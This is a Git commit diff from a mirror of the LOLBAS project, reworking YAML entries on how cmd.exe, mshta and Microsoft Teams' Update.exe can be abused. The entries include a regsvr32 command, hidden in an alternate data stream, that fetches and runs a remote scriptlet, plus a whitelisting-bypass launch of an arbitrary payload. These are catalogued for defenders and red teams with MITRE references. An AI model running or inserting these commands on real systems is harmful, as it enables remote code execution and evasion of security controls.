public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-26 14:59:03 +01:00
Code Issues Projects Releases Wiki Activity

Adjusted new contributions

Browse Source
This commit is contained in:
Oddvar Moe 2019-06-27 13:40:03 +02:00
parent 95e37b7cbf
commit 285e4d78d8
3 changed files with 33 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
yml/OSBinaries/Cmd.exe.yml
View File

@ -1,19 +1,24 @@
---
Name: Cmd.exe Name: Cmd.exe
Description: The command-line interpreter in Windows Description: The command-line interpreter in Windows
Author: 'Ye Yint Min Thu Htut' Author: 'Ye Yint Min Thu Htut'
Created: '2019-06-26' Created: '2019-06-26'
Commands: Commands:
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
Description: To add content in an Alternate Data Stream (ADS). Description: Add content to an Alternate Data Stream (ADS).
Command: cmd.exe - < fakefile.doc:payload.bat
Description: Execute payload.bat which is stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS Category: ADS
Privileges: User Privileges: User
MitreID: T MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T MitreLink: https://attack.mitre.org/wiki/Technique/T1170
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: cmd.exe - < fakefile.doc:payload.bat
Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
Privileges: User
MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\System32\cmd.exe

2
yml/OSBinaries/Mshta.yml
View File

@ -35,7 +35,7 @@ Commands:
Privileges: User Privileges: User
MitreID: T1170 MitreID: T1170
MitreLink: https://attack.mitre.org/wiki/Technique/T1170 MitreLink: https://attack.mitre.org/wiki/Technique/T1170
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
Full_Path: Full_Path:
- Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\System32\mshta.exe
- Path: C:\Windows\SysWOW64\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe

33
yml/OtherMSBinaries/Teams-update.yml
View File

@ -1,25 +1,32 @@
--- ---
Name: Update.exe Name: Update.exe
Description: Update is the squirrel update utility used by Microsoft Electron app (Teams in this case) Description: Update is the squirrel update utility used by Microsoft Electron app (Teams in this case)
Author: Mr.Un1k0d3r Author: 'Mr.Un1k0d3r'
Created: 2019-06-26 Created: '2019-06-26'
Commands: Commands:
- Command: Copy your payload into `%userprofile%\AppData\Local\Microsoft\Teams\current\`. Then run the following command `%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"` - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: The Update.exe will execute the file you copied into the current folder. Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Application Whitelisting Bypass Usecase: Application Whitelisting Bypass
Category: AWL Bypass Category: AWL Bypass
Privileges: user privs Privileges: User
MitreID: T1033 MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1033 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed OperatingSystem: Windows 7 and up with Microsoft Teams installed
Full_Path: Full_Path:
- Path: %userprofile%\AppData\Local\Microsoft\Teams\Update.exe - Path: '%userprofile%\AppData\Local\Microsoft\Teams\Update.exe'
Detection: Detection:
- IOC: Update.exe spawned an unknown process - IOC: Update.exe spawned an unknown process
Resources: Resources:
- Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408 - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
Acknowledgement: Acknowledgement:
- Person: Mr.Un1k0d3r - Person: Mr.Un1k0d3r
Handle: @MrUn1k0d3r Handle: '@MrUn1k0d3r'
--- ---